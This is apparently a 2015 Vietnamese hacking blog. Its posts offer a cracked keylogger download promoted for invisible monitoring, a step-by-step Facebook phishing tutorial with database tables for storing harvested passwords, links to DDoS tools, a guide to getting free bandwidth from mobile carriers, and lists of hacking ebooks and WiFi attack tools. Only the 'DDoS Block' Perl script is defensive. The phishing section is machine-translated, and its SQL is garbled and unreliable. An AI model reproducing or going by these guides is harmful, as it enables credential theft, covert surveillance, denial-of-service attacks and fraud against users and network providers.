Thứ Tư, 30 tháng 9, 2015

TOP 10 WEB FREE DOMAIN

TK Domain Extension
https://www.youtube.com/watch?v=r0zJoDWFOYo
Dot.tk Review
.CF Domain Extension
Dot.cf Review
.GA Domain Extension
My.ga Review
.ML Domain Extension
Point.ml Review
Free Domain Review
FreeDomain.co.nr Review
Popnic Review
Popnic.com Review
Subdomain Review
Subdomain.com Review
CoDotVu Review
CoDotVu.com Review
Free Available Domains Review
FreeAvailableDomains.com Review
Uni.me Review

FREE HOSTING 10$

https://www.youtube.com/watch?v=xQkZNDAExY0

New - Free VPS (Linux & Windows)







https://www.youtube.com/watch?v=0yXTN-c9_TE

Thứ Ba, 29 tháng 9, 2015

Share KEYLOGGER mới crack free 100%

Tôi cung cấp cho bạn The Best Keylogger Full Version có ngày hôm nay! Với tài năng này, bạn có bằng chứng có thể biết chính xác là đang xảy ra trên máy tính của bạn mà không cần thậm chí bạn có được ở đó. Bạn có thể gửi tất cả những phẩm chất để email của bạn hoặc địa chỉ ftp. Bạn thậm chí có thể tuôn ra tất cả những phẩm chất để tham vọng USB của bạn một khi chèn vào. Các pháo đài keylogger tốt nhất ở chế độ ẩn và hoàn toàn vô hình trên tính toán của bạn:3
DOWLOAD :
http://kiwi6.com/file/5e7rjsjdgr?autostart&utm_campaign=hotlink&utm_source=http%3A%2F%2Fadfoc.us%2Fx35627738&utm_medium=redirectext&utm_content=5e7rjsjdgr

Thứ Hai, 28 tháng 9, 2015

DDoS Block PERL NEW HOT

CODE:

#!/usr/bin/perl

###############################################################################
## DDOSBlock version 0.1 Author: Jo3-GHT                                      #
##                                                                            #
## Download from https://sourceforge.net/projects/ddosblock                   #
##                                                                            #
## To execute, run:                                                           #
##                                                                            #
## ./ddosblock-0.2.pl                                                         #
###############################################################################

use strict;
use warnings;

use vars qw(%CONFIG %blocked);

$| = 1;

my %CONFIG = (

  ## 0 = No output
  ## 1 = Actions reported
  ## 2 = Actions + unix commands reported
  ## 3 = Verbose in the extreme

  DEBUG => 2,

  ## Do we perform checks only - no IPTABLE changes - Good for debugging

  TESTMODE => 0,

  ## Ban IP addresses above this number of accesses

  THRESHOLD => 150,

  ## How long, in seconds, between checks

  INTERVAL => 30,

  ## If we have APF use that, otherwise fallback on iptables

  USEAPF => 0,

  ## How long (in seconds) do we ban people for
  ## escalating each time they're bad
  ## This resets to the first item, when they have gone
  ## a full interval without being flagged
  ##
  ## 60, 300, 3600 would mean that they are banned for 60 seconds, then 5 minutes, then an hour
  ##
  ## This list can have as many increment levels as you like

  BANINCREMENTS => [60, 120, 240, 800, 1200],

  ## IP ADDRESSES THAT WE WILL NEVER BAN

  EXCLUDEIPS => [ "127.0.0.1", "10.0.0.1" ],

  ## UNIX COMMANDS

  NETSTAT => "/bin/netstat",

  IPT => "/usr/sbin/iptables",

  APF => "/usr/local/sbin/apf",

  SENDMAIL => "/usr/sbin/sendmail",

  ## WHERE TO STORE/SAVE OUTPUT

  LOGDIR => "/var/log/ddosblock",

  MAILTO => "nobody\@example.com", # NOTE: Under Perl you have to escape the @ symbol with a slash

  STDOUT => 1, # In addition to logging, do we want to report it to STDOUT

);

$CONFIG{TOTINCREMENTS} = $#{$CONFIG{BANINCREMENTS}};
$CONFIG{LISTFILE}      = "$CONFIG{LOGDIR}/bannedips.txt";
$CONFIG{LASTDAY}       = 0;

if ( ! -d $CONFIG{LOGDIR})
{
  print "Creating log directory $CONFIG{LOGDIR}\n\n";
  mkdir $CONFIG{LOGDIR},700;
}

my $command = qq($CONFIG{NETSTAT} -ntu | awk '{ sub(/(.*)\:/,"",\$4); sub(/\:(.*)/,"",\$5); print \$5,\$4}' | grep ^[0-9] | sort | uniq -c | sort -nr | head -30 );

&rotatelog();

if ($CONFIG{TESTMODE} == 1)
{
  &debug(qq(** NOTE **\n\nTest mode - No IPTABLE changes will be made\n));
}

&loadbanned();

while (1)
{
  &rotatelog();

  &check();

  &release();

  &debug(qq(- Sleeping for $CONFIG{INTERVAL} seconds\n)) if ($CONFIG{DEBUG} > 1);

  sleep $CONFIG{INTERVAL};
}

sub rotatelog
{
  my @date = localtime();
  my $weekday = $date[6];

  if ($weekday != $CONFIG{LASTDAY})
  {
    if ($CONFIG{LASTDAY})
    {
      close(DEBUG);
    }
    $CONFIG{LASTDAY} = $weekday;

    open(DEBUG, "> $CONFIG{LOGDIR}/doslog.$weekday.txt");
  }
}

sub check
{
  my @input = `$command`;

  my $now = time;

  my $savelist;

  INPUTLOOP:
  foreach my $item (@input)
  {
    chomp($item);

    $item =~ s/^ +//io;
    $item =~ s/ +/ /io;

    &debug("-- $item\n") if ($CONFIG{DEBUG} >= 3);

    my ($hits, $ipaddress, $port) = split(/ /, $item);

    next INPUTLOOP if (grep(/^$ipaddress/, @{$CONFIG{EXCLUDEIPS}}));

    next INPUTLOOP if (defined $blocked{$ipaddress} && $now < $blocked{$ipaddress}{sleepuntil});

    if ($hits > $CONFIG{THRESHOLD})
    {
      $blocked{$ipaddress}{blocklevel} = $blocked{$ipaddress}{lastblock} + 1 || 1;
      $blocked{$ipaddress}{lastblock}  = $blocked{$ipaddress}{blocklevel};

      if ($blocked{$ipaddress}{blocklevel} == 1)
      {
        my $iptcmd     = ($CONFIG{USEAPF}) ?
          "$CONFIG{APF} -d $ipaddress"
        :
          "$CONFIG{IPT} -I INPUT -s $ipaddress -j DROP";

        my $ok = `$iptcmd` unless ($CONFIG{TESTMODE});

        &debug("Adding block for $ipaddress ($hits hits/minute, port $port)") if ($CONFIG{DEBUG} > 0);
        &debug("- Command $iptcmd") if ($CONFIG{DEBUG} > 1);

        if ($CONFIG{MAILTO})
        {
          my $localtime = localtime();

          open (MAIL, "| $CONFIG{SENDMAIL} -t");
          print MAIL qq(To: $CONFIG{MAILTO}\nSubject: IP address $ipaddress banned\n\nBanned ip addresses $ipaddress on $localtime with $hits hits\n);
          close (MAIL);
        }
      }
      else
      {
        &debug("Setting $ipaddress to block level $blocked{$ipaddress}{blocklevel} ($hits hits/minute)") if ($CONFIG{DEBUG} > 0);
      }

      &updatesleep($ipaddress);

      $savelist = 1;
    }
  }

  # Save a list of banned IPs to a file incase this process dies
  if ($savelist)
  {
    &savebanned();
  }
}

sub release
{
  my $now = time;
  my $savelist;

  # Loop through all the IP addresses flagged

  foreach my $ipaddress (keys %blocked)
  {
    # No point looking at it until we've gone past the sleep date

    if ($now > $blocked{$ipaddress}{sleepuntil})
    {
      $blocked{$ipaddress}{passcount}++;

      # Remove the block on the first pass
      # then remove the

      if ($blocked{$ipaddress}{passcount} == 1)
      {
        # Release the block

        my $iptcmd = ($CONFIG{USEAPF}) ?
          "$CONFIG{IPT} -u "
          :
          "$CONFIG{IPT} -D INPUT -s $ipaddress -j DROP";

        &debug("Removing block from $ipaddress") if ($CONFIG{DEBUG}> 0);
        &debug("- Command $iptcmd") if ($CONFIG{DEBUG} > 1);

        my $ok = `$iptcmd` unless ($CONFIG{TESTMODE});

        $blocked{$ipaddress}{blocklevel} = 0;
      }
      else
      {
        &debug("- Two passes without issue $ipaddress, forgetting block level") if ($CONFIG{DEBUG} > 1);
        delete $blocked{$ipaddress};
      }

      $savelist = 1;
    }
  }

  # Save a list of banned IPs to a file incase this process dies
  if ($savelist)
  {
    &savebanned(\%blocked);
  }
}

sub updatesleep
{
  my ($ipaddress) = @_;

  my $blocklevel = $blocked{$ipaddress}{blocklevel};

  $blocklevel = ($blocklevel >= $CONFIG{TOTINCREMENTS}) ? $#{$CONFIG{BANINCREMENTS}} : $blocklevel;

  my $increment = $CONFIG{BANINCREMENTS}[$blocklevel - 1];

  $blocked{$ipaddress}{sleepuntil} = time + $increment;

  my $stamp = localtime(time + $increment);

  &debug("- Will check $ipaddress after $increment seconds ($stamp) - Block level $blocklevel") if ($CONFIG{DEBUG} > 1);
}

sub loadbanned
{
  undef %blocked;

  if (-f $CONFIG{LISTFILE})
  {
    open(LIST, "< $CONFIG{LISTFILE}");
    my @list = <LIST>;
    close (LIST);

    # Rebuild a list of those things we've blocked
    foreach my $ipaddress (@list)
    {
      chomp($ipaddress);

      # Let them be released and evaluated again
      $blocked{$ipaddress}{sleepuntil} = 1;
      $blocked{$ipaddress}{blocklevel} = 1;
      $blocked{$ipaddress}{lastblock}  = 1;
      $blocked{$ipaddress}{passcount}  = 0;

      &debug("- Loading blocked IP $ipaddress") if ($CONFIG{DEBUG} > 0);

    }
  }
}

sub savebanned
{
  my ($list) = @_;

  open(LIST, "> $CONFIG{LISTFILE}");
  print LIST join("\n", keys %blocked);
  close (LIST);
}

sub debug
{
  my ($line) = @_;

  print DEBUG localtime() . " $line \n";

  if ($CONFIG{STDOUT})
  {
    print localtime() . " $line \n";
  }
}

Chủ Nhật, 27 tháng 9, 2015

Ebook Hacking Highschool dành cho các bạn muốn trở thành hacker :)

Đây là 1 tài liệu rất hay cho những bạn mới bắt đầu làm quen với hack và đang học quản trị mạng như mình nữa 


Bộ ebook này gồm 12 lesson: 

Lesson 01 - Being a Hacker 
Lesson 02 - Windows and Linux 
Lesson 03 - Ports and Protocols 
Lesson 04 - Services and Connections 
Lesson 05 - System Identification 
Lesson 06 - Malware (Viruses, Trojans, etc.) 
Lesson 07 - Attack Analysis 
Lesson 08 - Digital Forensics
Lesson 09 - E-mail Security and Privacy 
Lesson 10 - Web Security and Privacy 
Lesson 11 - Passwords 
Lesson 12 - Internet Legalities and Ethics 
Link download: 
http://www.mediafire.com/?p2h2uxgvvvytcec
pass: bkav

Ngoài ra, một số bài trong ebook đã được dịch sang tiếng việt, các bạn download về đọc cho dễ hiểu nhé. 
Bài 1 : http://www.mediafire.com/?z8tyj2bcpdwjy6h

Bài 2 http://www.mediafire.com/?2f5rf91zjcc4f82

Bài 3 http://www.mediafire.com/?42x1arldny49vn4

Bài 4 http://www.mediafire.com/?y2dhtkj2ndjrfk4

Share Ebooks Hacking Chọn Lọc

Trong quá trình tìm hiểu Hacking, sau đây là những ebook hay, được soleil đánh giá cao và muốn chia sẻ. 
1 – Tài liệu hướng dẫn sử dụng BackTrack 5 – Version tiếng viêtk

http://www.mediafire.com/view/?2kd8k4ri9jlfh68 
Tài liệu này được viết bởi cutynhangheo - Admin HCE theo kiểu biên dịch lại từ Ebook tiếng anh. Tuy chỉ nói lên 1 phần nhỏ của công cụ hack kinh điển backtrack nhưng khá bổ ích đối với các bạn đang bắt đầu tìm hiểu về Backtrack.
2 – Tấn công và bảo vệ hệ thống

http://www.mediafire.com/view/?oe6vgwigw3h7sc2 
Ebook này được viết bởi giảng viên TT Itrain – Chuyên gia bảo mật hàng đầu tại VN - tocbatdat. Với tư duy loric, kiến thức thâm hậu, cách viết rõ ràng, chi tiết. Độc giả có thể dễ dàng hiểu và nắm bắt bản chất các vấn đề xoay quanh: Nguyên tắc scan port, nguyên lý truyền tin, DDos-Botnet – Trojan-Backdoor, Gmail Hacking, Website Hacking ...
3 – Elite Collection HVA

http://www.mediafire.com/?1a46wavdgj121rb 
Ebook này được tổng hợp lại bằng phần mền – bao gồm tất các các tài liệu của nhóm Hacker hàng đầu Việt Nam – HVA với tất cả các vấn đề cơ bản xoay quanh, liên quan đến bản chất Hacking như: Unix, Lunix, Windown, Registry, How to be a Hacker...
4 – Ghi Nhớ Ubuntu

http://www.mediafire.com/view/?p6s1pv966a44rcl 
Ebook ghi nhớ các lênh trong hệ điều hành linux – Ubuntu – Cái không thể không biết khi nghiên cứu, tìm hiểu về hacking. Ebook tổng hợp khá chi tiêt và đầy đủ các câu lệnh.
5 - The Hacker's Underground Handbook 
Cuốn Ebook về hacking nước ngoài, viết về các vấn đề xoay quanh hacking như : programming, linux, password, Network Hacking, Wireless Hacking, Windown Hacking, Malware, WebsiteHacking. Cuốn ebook khá hay và chi tiết – Có cách nhìn tổng thể về hacking. Giá bán trên thị trướng khoảng vài trăm dolla.


1 số Ebook khác:
- Ebook Group HCE - Hacking + Crack = Enjoin
http://www.mediafire.com/?t9z633ovjnfa7rj 
- Ebook Group BYG – BeYeuGroup
http://www.mediafire.com/?6cqwgstt5zz2u2u 
- CEH version tiêng việt
http://www.mediafire.com/?1j8ulawa7jbya33 
- The Web Application Hacker’s Handbook
http://www.mediafire.com/view/?q2lnrgb70jtj169 
- Hacker Web Exploitation 
http://www.mediafire.com/?hzlacnv5sxddpje 
- CEH V.7 - Certified Ethical Hacker
http://www.mediafire.com/?n24cd59flriik35 
-CHFI - Computer Hacking Forensic Investigator 
http://www.mediafire.com/?4kwnoo0jji5p95v 

- Ebook SQLI- Editor by Headshot
Tất cả các password download là: soleil_vhb 

Wifi Hacking Tools

Aircrack-ng

It is a software suit specially designed for a wireless network and which operates under both the Windows and the Linux Operating System. Aircrack-ng consists of a packet sniffer, WPA cracker and analysis tool and a detector for the wireless Local Area Networks (802.11). The best part of this software suit is one need not install it to use it. It is a collection of files which can be easily used with a command prompt.

There have been many wireless hacking tools exposed in recent past. When a hacker hacks a wireless network, it is supposed to defeat the Wireless network’s security devices. The Wi-Fi networks i.e. the Wireless LANs are more exposed to the security threats from a hacker while compared to that of a wired network. While hackers are always more than ready to hack specially if there are weaknesses in a computer network, hacking is often a tedious and complicated procedure.

Kismet

Kismet is a wireless detector system which detects possible intrusion to an 802.11 layer2 wireless network, it is also a sniffer. There are certain plug-in supported by Kismet which enable sniffing media like DECT. . It also has the capacity to infer whether a non beaconing network is present or not via the data traffic in the network and a network is identified by this tool by collecting data packets passively, detecting hidden and standard named networks.

InSSIDer

InSSIDer is a network scanner which is used in a Wi-Fi network for the Windows Operating System as well as the Apple OS X. It has been developed by MetaGeek, LLC. It is used to collect information from both software and a wireless card and is useful in selecting the availability of the best wireless channel. It also shows those Wi-Fi network channels which overlap with each other.

KisMAC

It is a discovery tool for a wireless network for the Mac OS X operating system. It has many features which are similar to another wireless detector tool called Kismet. This tool is meant for expert network security personnel and is not very user friendly for the beginners

Firesheep

In order to log into a website, a user has submit details like his or her username and password. The server validates these data and sends back a “cookie”. The websites usually encrypts the password however does not encrypt other details which leaves the cookie exposed to hacking threats which are also known as HTTP session hijacking. Firesheep has a packet sniffer which can intercept the cookies which are encrypted from Social Media sites like Twitter and Facebook and comes with the Firefox web browser. Firesheep is available for both the Windows and Mac OS X operating system. It would also run on the Linux platform in the new future.

Airjack

It is a powerful tool for packet injection in an 802.11 wireless network and is very useful as it has the capability to send in forged de-authentication packets. This feature is usually used by a hacker to bring down a network.

KARMA

KARMA is an attack tool which takes the advantage of the probing techniques that is used by used by a client of a WLAN. The station searches for a Wireless LAN in the list of preferred network and it is then that it makes the SSID open for an attacker who is listening. The disclosed SSID is used by KARMA for impersonation of a valid WLAN and attracts the station to the listening attacker.

NetStumbler

NetStumbler is a hacking tool which is used in the Windows Operating system and comes with add ons which are used to hack a wireless network. It has the capability to convert a WIFI enabled laptop on Windows OS into a network detector in an 802.11 WLAN.

WepLab

The WebLab is a tool which teaches about the weaknesses of a WEP, how a WEP works and how it is used to break a wireless network which is WEP protected. It has the features of a WEP Security Analyzer.

Thứ Bảy, 26 tháng 9, 2015

5 bước thế nào để Hack Password tài khoản Facebook

5 bước thế nào để Hack Password tài khoản Facebook
là hướng dẫn tôi thực hiện để tiếp tục khác làm thế nào để hack một tài khoản facebook hướng dẫn từ Hacking-tutorial.com.



Ngày Làm thế nào để Hack trang tấn công phishing Facebook (xem tại đây) có một nhận xét từ jordin71 mà hỏi cho trang facebook ẩn mới, bởi vì các hướng dẫn cuối cùng là giao diện facebook cũ. Vì vậy, chúng tôi quyết định để làm cho cái mới để cập nhật các tập tin ẩn facebook.

Chúng tôi cũng muốn nhắc nhở bạn một lần nữa rằng hướng dẫn này Làm thế nào để hack tài khoản Facebook và các tập tin tải về là miễn phí để sử dụng và mục đích là cho giáo dục. chúng tôi không chịu trách nhiệm cho bất kỳ sự lạm dụng của tập tin này.

Yêu cầu:

1. Trang ẩn Facebook http://www.hacking-tutorial.com/tools/subscribers/index.php?id=fakebook

2. MySQL Table Query (bảng MySQL cho hướng dẫn này)

-
- Cấu trúc bảng cho bảng `fb_fail`
-

CREATE TABLE IF EXISTS `fb_fail` KHÔNG (
  `id` int (10) NOT NULL AUTO_INCREMENT,
  `varchar uname` (255) NOT NULL,
  `pwd` varchar (255) NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE = MyISAM DEFAULT CHARSET = latin1 AUTO_INCREMENT = 1;

- ------------------------------------------------ --------

-
- Cấu trúc bảng cho bảng `fb_login`
-

CREATE TABLE IF EXISTS `fb_login` KHÔNG (
  `id` int (10) NOT NULL AUTO_INCREMENT,
  `varchar uname` (255) NOT NULL,
  `pwd` varchar (255) NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE = MyISAM DEFAULT CHARSET = latin1 AUTO_INCREMENT = 2;

-
- Đổ dữ liệu cho bảng `fb_login`
-
5 bước thế nào để Hack Password tài khoản Facebook:

1. Tải tập tin facebook ẩn từ các liên kết ở trên

2. Bên trong tập tin facebook.rar có 3 file (index.php, login.php, và view.php), bạn cần phải cấu hình 2 trong số họ (login.php và view.php) để phù hợp với cấu hình máy chủ cơ sở dữ liệu của bạn.

5 bước thế nào để Hack Password tài khoản Facebook

3. Trong bước thứ ba này, bạn có thể xem hướng dẫn trước đây của tôi về làm thế nào để hack tài khoản facebook bằng cách sử dụng phương pháp phishing (xem hướng dẫn ở đây)

4. Đây là giả ảnh chụp màn hình trang facebook giao diện xem trước bằng cách sử dụng trình duyệt của tôi.

5 bước thế nào để Hack Password tài khoản Facebook

5. Nếu một người nào đó đã đăng nhập, chúng ta có thể xem các mật khẩu được thu hoạch ở trang view.php.



5 bước thế nào để Hack Password tài khoản Facebook

Cập nhật !!:

Tìm hiểu từng bước cài đặt trang facebook giả mạo trên máy tính cục bộ

Hack Facebook Scam hướng dẫn

Biện pháp đối phó:

1. Xem kỹ thanh URL địa chỉ trình duyệt, không tiếp tục để duyệt nếu bạn tìm thấy những URI được đánh nhầm, chỉ facebook.com thật.

2. Nếu bạn nhập tên người dùng và mật khẩu của bạn một cách chính xác, nhưng các trang facebook chuyển hướng bạn đến sai tên đăng nhập hoặc mật khẩu trang báo lỗi, thấy URL thanh địa chỉ trình duyệt trong trường hợp bạn mở trang facebook giả.

Hy vọng bạn tìm thấy nó hữu ích :-)

Thứ Hai, 21 tháng 9, 2015

Tài liệu CEH Tiếng việt (VSIC)

Tài liệu CEH Tiếng việt (VSIC)


Chia sẻ mọi người tài liệu thực hành của Visic

Đây là link của 3 File:

CEH_Lab_book_tieng_Viet_phan1.pdf
CEH_Lab_book_tieng_Viet_phan2.pdf
CEH_Lab_book_tieng_Viet_phan3.pdf

Link CEH v5 (bản tiếng Anh):
http://www.box.net/shared/09zm8nulu5

[Hacking] Đồ án tấn công DdOS (rất nhiều tài liệu hay)


Distributed Denial Of Service (DDoS) là kỹ thuật tấn công làm các ISP lo âu, giới hacker chính thống thì
không công nhận DdoS là kỹ thuật tấn công chính thống. Thế nhưng Black hat đang có rất nhiều ưu thế khi triển khai tấn công bằng kỹ thuật DdoS.

Việc phòng ngừa và ngăn chặn DdoS vẫn còn đang thực hiện ở mức độ khắc phục hậu quả và truy tìm thủ phạm. Vậy DdoS là gì mà có nhiều yếu tố đặc biệt như vậy? Bài viết này cố gắng trả lời câu hỏi này dưới lăng kính security. Bố cục bài viết gồm:

Highslide JS


- Giới thiệu về DDoS
- Phân tích các loại tấn công kiểu DDoS
- Phân tích các kỹ thuật Anti-DDoS
- Nhân tố con người trong Anti- DDoS
- Một số trường hợp tấn công DDoS


Các file trong Đồ án tấn công DDOS:
Trích dẫn
DDOS21.doc
DDOS.DOC
Đề Cương Chi Tiết.doc
Denial of Service DOS.rtf
Dos11.rtf
DoS- Denial of Service.rtf
phan biet DOS VA DDOS.rtf
Tìm hiểu về tấn công từ chối dịch vụ DoS.doc
Download link mediafire.com
Tệp tin tải về

Chủ Nhật, 20 tháng 9, 2015

DDOS PERL AND PYTHON 2015

Download: https://www.sendspace.com/file/8drocg

tut hướng dẫn
https://youtu.be/1JwaGTXx9i4
    

Hướng dẫn hack băng thông tháng 3 - 2015 gói mimax Viettel

* Tool phát triển bởi Thiên Sứ Alice

* Link download ở đây : Tải về
* Hướng dẫn :
- Các bạn tải file ở trên về copy và chép đè vào thư mục cài D-com (xem hình)
C:\Program Files\D-com 3G



-  Copy và Past xong rồi tiến hành cắm Dcom vào và mở Dcom lên.

- Vào tạo một cấu hình mới, cấu hình mặc định connect sẽ không được, gây lỗi nên bạn phải tạo cấu hình mới. VD : tên cấu hình là "hack3g", "v-mms", user và pass : "mms"
(*) Lưu ý: không đc đặt tên cấu hình là Vinaphone, 3g,Viettel,MobiFone,..  hay là các tên có liên quan đến nhà mạng.

* Cách hack :
- Lưu ý là áp dụng cho gói mimax của tất cả nhà mạng hoặc các bạn cũng có thể thử trên gói mimin trên sim 0đ (với điều kiện hack bằng VPN)
- Các bạn tiến hành hack theo >>  chỉ 2g >> apply (chờ sóng hiện 2G)>> Chỉ 2G/3G (auto)  >> Connect
- Sau đó sử dụng một trong các phần mềm sau đây để tiến hành phá băng thông:
 * Phần mềm 1 : PD-Proxy

* Phần mềm 2 : RamVPN : RamVPN-HSS+Setup.rar
- Tiếp theo bạn tải phần mềm VPN để tăng tốc độ mạng : RamVPN-HSS+Setup.rar
+  Cài RamVPN-HSS+Setup.rar
+ Chọn Server muốn Connect
+ Nếu Server chưa Connect được thì thử Server khác
+ Và kết quả báo Connect thành công sẽ xuất hiện như hình dưới đây:


 * Phần mềm 3: HexVPN : Hex_VPN+.rar
_ Lưu ý_ : để chay HexVPN được thì bạn phải chạy chung với phần mềm RamVPN ở trên nhé!
Vì RamVPN hỗ trợ đọc file (.ovpn) riêng biệt từ new folder bạn đã tạo.
- Các bạn giải nén Hex_VPN+.rar ra..
- Khởi động phần mềm và chọn Server bạn muốn Connet > OK! Speedtets > Speedmax

- Chúc các bạn thành công!

* Hướng dẫn cập nhật file (.ovpn): cho ai cần
- Các bạn mở thư mục HEXVPN+ lên :
+ Chép file (.ovpn) bạn đã tìm và tải về >> vào theo đường dẫn : Hex VPN+\data\config\(tạo một thư mục và past vào)
VD: Hex VPN+\data\config\Andy Nguyễn
+ Ở đây mình có cập nhật file (.opvn) server USA trong Server Andy Nguyễn, tuy nhiên bạn nên cập nhật thêm VPN còn sống như Server Japan,CA,..
+ Các bạn có thể tìm và tải file (.opvn) ở link sau đây : hack băng thông miễn phí với VPN
+ Xong rồi đó
- Khởi động phần mềm lên và chọn Server bạn vừa tạo và chạy thôi nào!

Thay đổi giao diện web giống Hacker

Đừng lo,hôm nay Thớt sẽ hướng dẫn các mem cách thay đổi giao diện các web như
Google,Youtube,v...v... Đầu tiên,mở new tab bấm Web Store(Google Store)ghi Stylish, làm biếng thì link đây  https://chrome.google.com/webstore/detail/stylish/fjnbnpbmkenffdnngjfgmeleoegfcffe?utm_source=chrome-ntp-icon ,bấm vào +Miễn Phí :

Bấm Thêm :

Stylish đã được cài :

Bấm vào Thanh công cụ có chữ S như trong hình : (Hơi khó thấy gáng nhìn ha! )

Khi đã bấm vào rồi,tiếp tục bấm hàng chữ  Find more styles for this site :

Khi bấm vào thì nó ra cái web này :

Rồi tìm những giao diện của các web,youtube chẳng hạn :

Chọn hình mình thích rồi bấm Install with Stylish :

Ok :

Style installed !!! :

Chờ 10 giây,vào youtube và nhận thành quả :

Hoặc theo cách trên,thay đổi giao diện Google :

Enjoy nhé các bạn!!!!!

Thứ Sáu, 18 tháng 9, 2015

Hướng dẫn kết nối mạng trên Windows dùng D-Com 3G nhanh ngang ngửa mạng VNPT 10GB/tháng free suốt đời

Bài này mình thực hành trên D-Com 3GB Model E1750 đã unlock dùng đa mạng và sử dụng sim
mobi hết tiền. Các model khác và usb 3g của nhà mạng khác có thể làm tương tự nhưng, mình làm thành công trên sim mobi còn mạng khác mình không biết nhé.

Đầu tiên gỡ toàn bộ phần mềm Pdanet và driver của nó nếu bạn đã cài trước đó

Unlock d-com để dùng sim mobi thì các bạn tìm trên mạng, ai không thể làm được thì inbox mình

Unlock xong, dashboard dcom nhận sim mobi rồi thì vào Công cụ => Lựa chọn => Mạng => chỗ Loại mạng chọn Chỉ UTMS

1.JPG


Chuyển qua tab Chế độ đăng ký Tích vào Tìm kiếm và đăng ký thủ công rồi ấn nút Làm mới, chờ 1 lúc nó hiện ra 1 danh sách mạng thì chọn GPC(3G) rồi ấn OK

2.JPG

Chỗ cột sóng hiện đang chuyển vùng như này là OK
3.JPG 

Giờ ấn kết nối như bình thường, bước tạo cấu hình kết nối có trong bài hướng dẫn Unlock rồi m ko hướng dẫn nữa

tải OpenVPN cho windows tại đây http://openvpn.net/index.php/open-source/downloads.html

Tải về cài đặt bình thường, ae cài thêm .net framework 4.0 trở lên nhé

tải file này về http://vk.com/doc291363550_364939402

mở file vừa tải = notepad++ tìm từ underground và thay bằng tên tài khoản zpn của bạn, sau đó lưu lại, copy file đó vào thư mục C:\Program Files\OpenVPN\config

rồi ra desktop clik 2 lần vào cái OpenVPN GUI

6.JPG 

sau đó dưới khay hệ thống bên phải sẽ hiện 1 icon màn hình máy tính với cái khóa, các bạn clik chuột phải vào đấy rồi ấn connect, xong hiện lên 1 cái bảng, đòi nhập tài khoản thì các bạn nhập tài khoản ZPN của các bạn vào và ấn Enter, chờ nó chạy 1 lúc sẽ tự ẩn xuống rồi cái icon màu xanh như này là ok, vào mạng tẹt ga, như đc mẹ lắp mạng cho :byebye:. Dùng hết 10GB thì mở file .ovpn lên thay tên người dùng và lúc connect nhập người dùng mới là xong

5.JPG 

À, vì server ở nước ngoài Ping rất cao nên ko chơi nổi LOL đâu nhé, lướt web xem JAV thì mượt khỏi chế. Ai copy bài này giữ cho mình cái nguồn là Underground - Gócmobile.Net nhé ^^

Đã update link never Die, Lưu ý, chỉ support cho những ai like top :))